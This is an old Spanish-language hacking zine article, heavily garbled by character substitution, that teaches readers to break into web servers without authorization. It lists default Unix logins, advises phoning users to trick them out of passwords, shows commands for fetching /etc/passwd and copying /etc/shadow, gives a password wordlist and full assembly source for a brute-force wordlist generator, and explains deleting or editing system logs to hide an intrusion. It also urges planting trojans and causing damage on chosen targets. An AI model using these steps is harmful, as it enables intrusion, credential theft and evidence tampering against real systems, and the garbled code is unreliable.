4

"Guia para crackear Websites & Homepages" por Le PomPaItor

"Lo espantoso no es la altura, sino la pendiente. La pendiente donde la mirada se precipita a lo hondo y la mano se extiende hacia la cumbre. Alli es donde se apodera del corazon el vertigo de su doble voluntad." -Federico Nietzsche 1. Introduccion Si alguna vez has hechado a volar tu imaginacion se te habra ocurrido ue seria comico remover algunas gra!icas de algun "ebsite, o me#or aun borrar toda la pagina de algun enemigo para deleitarte con tu venganza. $ues bien, este es el manual ue te ayudara a lograrlo. $rimero deberas entender ue andar por ahi borrando paginas es %&'N&'% e inmaduro. Lo ue trato de hacer es ue sientas la adrenalina de entrar a un sistema al ue no estes autorizado y echar una o#eada alrededor. Si te dedicas a invadir sistemas y borrar archivos le uitaras el privilegio a otra persona de entrar a ese sistema ya ue el operador se dara cuenta de la intrusion y aumentaran la seguridad negando asi la entrada a mas (intrusos(. Si el sistema al ue entraste pertenece a unos hi#os de la chingada )$lantas Nucleares, *readores de abrigos de piel, Agencias de +obierno,etc, olvida lo antes dicho y haz ue se arrepientan de haberse conectado a la red causando -aos o me#or aun, in!ectandolos con algun buen virus )por ue no reemplazar un e#ecutable por un caballo de troya.,. /n !in, usa tu cabeza y cuida de no ser sorprendido en tus via#es de -AoS. 2. Websites 0n "ebsite es solamente una computadora llamada servidor por su capacidad de de realizar di!erentes tareas al mismo tiempo, e#ecutando un sistema operativo ue generalmente sera 0N12 o algunas de sus variaciones y con toda la in!ormacion guardada en algun medio. 3.4 +anando acceso a un servidor 555 A ui reside la magia del 6ac-er, la proteccion comun son dos preguntas Login y $ass"ord. /l usuario ue tenga una cuenta en ese servidor tiene un nombre de usuario )Login, y contrase7a )$ass"ord, por lo ue la entrada a ese servidor no tiene problemas8 pero para una persona a#ena a ese servidor la entrada es un poco mas complicada. $ara poder penetrar el sistema necesitamos saber su 09L y una vez conectados con el explorador prestar atencion al mensa#e "aiting reply !rom 4:;.;<.3< o algo parecido ue haga aparecer una direccion 1$ en lugar de el nombre de dominio. Si lograste conseguir la direccion 1$ usa telnet para conectarte a esa direccion. Si cuando tratas de conectarte aparece el mensa#e (connection re!used( probablemente este protegida esa direccion con una F19/5ALL. Si este es el caso trata de hacer telnet a el nombre de dominio con la !inalidad de llegar a el !rustrante L'+1N=$ASS5'9>. $ara entrar necesitas conseguir alguna cuenta haciendo algo de ingenieria social o intenta con los de!aults. % *0/N&AS >/FA0L&S >/ 0N12 % Login? $ass"ord? root root root system sys sys sys system daemon daemon uucp uucp tty tty test test unix unix unix test bin bin adm adm adm admin admin adm admin admin sysman sysman sysman sys sysman system sysadmin sysadmin sysadmin sys sysadmin system sysadmin admin sysadmin adm "ho "ho learn learn uuhost uuhost guest guest host host nuucp nuucp

3 r#e r#e games games games player sysop sysop root sysop demo demo Si !racasas al intentar el acceso usando cada uno de los anteriores logins, probablemente tengas ue conseguir el pass"ord de otra manera como relaciones humanas8 esto signi!ica ue vas a tener ue conseguir la clave valiendote de trucos como hablar por tele!ono a una persona ue sepas ue esta registrada en ese servidor y pedirle su Login y $ass"ord diciendo ue necesitas validar su cuenta o algo parecido. 'tra manera de conseguir un $ass"ord es crear un programa ue robe las claves de acceso del disco duro de una persona. ;. *uando se esta adentro 0na vez ue hayas logrado entrar a un sistema necesitaras localizar y obtener el archivo pass"d disponible en el directorio =etc $ara obtener el archivo $ASS5> usa el siguiente e#emplo? )@ simboliza el prompt 0N12, @ !tp F&$A get =etc=pass"d F&$A uit $ara ver el contenido de el archivo usa el siguiente comando? @ cat =etc=pass"d 0na vez ue tengas en tu posesion el archivo $ASS5> editalo y !i#ate en su contenido, debera tener la siguiente in!ormacion? usuario?contrase7a?1>?+rupo?descripcion=nombre?directorio?shell usuario - /ste es el login de algun usuario. contrase7a - /s el pass"ord de el usuario )encriptada con >/S, 1> - /s la identi!icacion de ese usuario. grupo - /l grupo al ue pertenece esta cuenta. descripcion- /l nombre del usuario. directorio - /l directorio de acceso de el usuario. shell - /l shell ue procesa los comandos de ese usuario. 0n e#emplo podria ser? #ohn?3;BabcCD?EEEE?4;?Fohn Fohnson?=home=dir=#ohn?=bin=#ohn Nombre de usuario? #ohn $ass"ord encriptado? 3;BabcCD 0suario numero? EEEE Numero de grupo? 4; >escripcion? Fohn Fohnson >irectorio de acceso? =home=dir=#ohn Shell? =bin=#ohn Si el archivo ue conseguiste contiene la misma in!ormacion pero en el campo del pass"ord tiene un asterisco )%, o cual uier otro caracter, signi!ica ue las contrase7as se encuentran (sombreadas(. Si las contraseGas se encuentra sombreada,las podras encontrar en el archivo shado" aun ue generalmente no se puede tener acceso a ese archivo a menos de tener root. 0na !orma de conseguir S6A>'5 es usando el comando cp para copiarlo a otro archivo y despues tratar de obtener el archivo al ue se copio, e#emplo? @cp =etc=shado" =usuarios=carlos=hac-.txt @!tp F&$A get =usuarios=carlos=hac-.txt F&$A uit @rd =usuarios=carlos=hac-.txt Algunas otras maneras de obtener el archivo S6A>'5 seran explicadas en otros numeros de 9are+aHz. Ia tengo los pass"ords encriptados, ahora ue. Los pass"ords estan encriptados usando one-"ay encription, signi!ica ue no se pueden des-encriptar. Lo ue 0nix hace es obtener la contraseGa del usuario,la encripta y la compara con la ue ya esta encriptada, si coinciden entonces se le permite el acceso. $ara poder obtener las contraseGas es necesario tener un archivo con palabras y usar un programa para ue encripte las palabras del archivo y las compare con las contrase7as encriptadas,si coinciden te avisa ue palabra !ue la ue coincidio con la contrase7a encriptada. Algunos programas de este tipo son? Nombre $alabras por Segundo *omputadora Fohn the 9ipper C:JJ C<D Starcrac-er 4;:: C<D

; *rac-er Fac- 4::< C<D Killer*rac-er ;C: C<D /stos programas se encuentran disponibles en cual uier pagina de 6ac-ers, si uieres la ultima version de Star*rac-er visita la siguiente 09L? http?==""".geocities.com=SiliconLalley=par-=<B:;=index.html $ara conseguir listas de palabras haz F&$ a el siguiente servidor? "ar"ic-.ac.udirectorio? =pub=cud Algunas de las palabras mas usadas en contraseGas son? aaa academia ada adrian aerobics airplane albany albatros albert alex alexander algebra alias alisa alpha alphabet ama amy analog anchor andy andrea animal ans"er anything arro" arthur ass asshole athena atmosphere bacchus badass bailey banana bandit ban-s bass batman beauti!ul beauty beaver daniel danny dave deb debbie deborah december desire desperate develop diet digital discovery disney dog drought duncan easy eatme edges ed"in egghead eileen einstein elephant elizabeth ellen emerald engine engineer enterprise enzyme euclid evelyn extension !air"ay !elicia !ender !inite !ormat god hello idiot #ester #ohn #ohnny #oseph #oshua #udith #uggle #ulia -athleen -ermit -ernel -night lambda larry lazarus lee leroy le"is light lisa louis love lynne mac macintosh mac- maggot martin marty marvin matt master maurice maximum merlin mets michael michelle mi-e minimum nic-i nicole rascal really rebecca remote ricreagan robot robotics rolex ronald rose rosebud rosemary roses ruben rules ruth sal saxon scheme scott secret sensor serenity sex shar- sharon shit shiva shuttle simon simple singer single singing smile smooch smother snatch snoopy soap socrates spit spring sub"ay success summer super support sur!er suzanne tangerine tape target taylor telephone temptation tiger tigger toggle tomato toyota trivial unhappy unicorn un-no"n urchin utility vic-i virginia "arren "ater "eenie "hatnot "hitney "ill virgin

B "illiam "inston "illie "izard "onbat yosemite zap "hatno" 'btuve algunas cuentas, ahora. $ara poder hacer y deshacer en el servidor necesitas el pass"ord de la cuenta root. Si despues de intentar con algunas listas de palabras no puedes necesitaras hacer un ata ue en bruto, es decir empezar desde la letra A hasta la palabra zzzzzzzz /l siguiente programa necesita ser compilado usando &ASM y es una lista de palabras &S9 ue no ocupa espacio en disco y puede ser modi!icada, es ideal para ata ues brutos a la cuenta r::tN )$rograma *opiado de $hrac- BJ, $ A S S 5 ' 9 > / N + 1 N / )!or 1OM $*(s, by 0ncle Armpit PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP Que tan practico es. /ste programa no necesita mucho espacio en disco y puede crear listas de palabras de gran tama7o. *on el e#emplo proporcionado, pass"ords empezando en (aaaaaaa( y terminando en (zzzzzzz( seran generados. *omo empiezo a usar esta lista de palabras. *ompila el codigo y nombralo "hac-drv.sys", despues necesitas con!igurarlo aGadiendo la siguiente linea en *'NF1+.SIS deviceRc?Shac-drv.sys 0na vez en memoria el programa creara la lista de variables en memoria llamada 6A*K$5>. *ual uier programa ue uses )excepto Star*rac-er, debera reconocer hac-p"d como una lista de palabras y empezar a crac-ear. Si deseas reiniciar una sesion desde una combinacion especi!ica solo modi!ica el archivo 6A*K>9L.SIS con un editor 6/2A>/*1MAL y modi!ica la cadena de caracteres con los ue empieza 8-: 8-----------------------cut here-------------------------------8$rogram 6A*K>9L.SIS 8 org :h nextNdev dd -4 attribute d" :c:::h 8character device "= ioctl calls strategy d" devNstrategy interrupt d" devNint devNname db (6A*K$5> ( countr d" o!!set number number db (aaaaaa(,:ah 8T---- D caracteres en minusculas )empiezo, numsize e u @-number - 3 a!ternum? 8"or-ing space !or device driver rhNo!s d" . rhNseg d" . devNstrategy? 8strategy routine mov cs?rhNseg,es mov cs?rhNo!s,bx ret! devNint? 8interrupt routine push! push ds push es push ax push bx push cx push dx push di push si cld push cs pop ds mov bx,cs?rhNseg mov es,bx mov bx,cs?rhNo!s mov al,es?UbxVP3 rol al,4 mov di,o!!set cmdtab xor ah,ah add di,ax #mp "ord ptrUdiV

C cmdtab? 8command table d" init 8: d" exit; 84 d" exit; 83 d" ioctlNread 8; d" doNread 8B d" exit; 8C d" exit; 8D d" exit; 8J d" exit; 8< d" exit; 8E d" exit; 84: d" exit; 844 d" ioctlN"rite 843 d" exit; 84; d" C dup )o!!set exit;, ioctlNread? push es push bx mov si,es?UbxP4:hV mov di,es?UbxP:ehV mov es,si push cs pop ds mov si,o!!set number xor cx,cx getNchar? lodsb stosb inc cl cmp al,:ah #z ioctlNrend #mp getNchar ioctlNrend? pop bx pop es mov es?UbxP:43hV,cx mov cs?countr,o!!set number #mp exit3 ioctlN"rite? push es push bx mov si,es?UbxP:4:hV mov ds,si mov si,es?UbxP:ehV mov cx,numsizeP4 8es?UbxP:43hV push cs pop es mov di,o!!set number repe movsb pop es pop bx mov cs?countr,o!!set number #mp exit3 doNread? push es push bx push cs pop ds

D mov si,UcountrV inc si 8"ord ptr UcountrV cmp si,o!!set a!ternum #nz isNo-ay mov si,o!!set number call incNnum isNo-ay? mov UcountrV,si mov di,es?UbxVP:eh mov ax,es?UbxVP:4:h mov cx, es?UbxVP:43h #cxz cleanNup mov es,ax repe movsb cleanNup? pop bx pop es #mp exit3 exit;? mov es?"ord ptr ;UbxV,:<4:;h #mp exit4 exit3? mov es?"ord ptr ;UbxV,:4::h exit4? pop si pop di pop dx pop cx pop bx pop ax pop es pop ds pop! ret! exit? incNnum proc near push si mov si,numsize reiterate? inc byte ptr UnumberPsiV cmp byte ptr UnumberPsiV,(z(P4 8P4 past ending char. in range #nz Nexit mov byte ptr UnumberPsiV,(a( 8starting char. in range dec si cmp si,-4 #nz reiterate mov byte ptr UnumberV,:4ah 8send /'F Nexit? pop si ret incNnum endp atNeo!? 8 the non-resident code starts here initial proc near push es push cs pop ds push cs pop es mov si,o!!set number mov di,o!!set tmpnum cld

J Nagain? lodsb cmp al,:ah #z Nnomorechars stosb #mp Nagain Nnomorechars? mov si,o!!set msgend mov cx,B repe movsb mov ah,:E 8print "elcome message mov dx,o!!set msg4 int 34h pop es ret initial endp init? call initial mov ax,o!!set atNeo! mov es?UbxVP:eh,ax push cs pop ax mov es?UbxVP:4:h,ax mov cs?"ord ptr cmdtab,o!!set exit; #mp exit3 msg4 db "1ncremental $ass"ord +enerator )c,4EEC",:ah,:dh db "5ritten by 0ncle Armpit",:ah,:dh,:ah,:dh db "Starting at "ord U" tmpnum db 4: dup )., msgend db "V",:a,:d,(@( 8/N> hac-drv.sys ----------------------------------cut here---------------------------------*omo limpiar tus huellas Si deseas ue tu ingreso con la cuenta r::t no uede registrado en los L'+S de el servidor revisa los directorios buscando archivos como logs, syslog, log, o cual uiera ue parezca ue guarda un reporte de los accesos y borralos o me#or aun editalos usando el editor de archivos de 0N12. $ara e#ecutar el editor usa el comando vi /dita o borra los siguientes archivos? =etc=syslog =etc=log =etc=logs /xisten algunos scripts para borrar las huellas como HA$W disponibles en la red y en los proximos numeros de esta revista.

Le PompaItor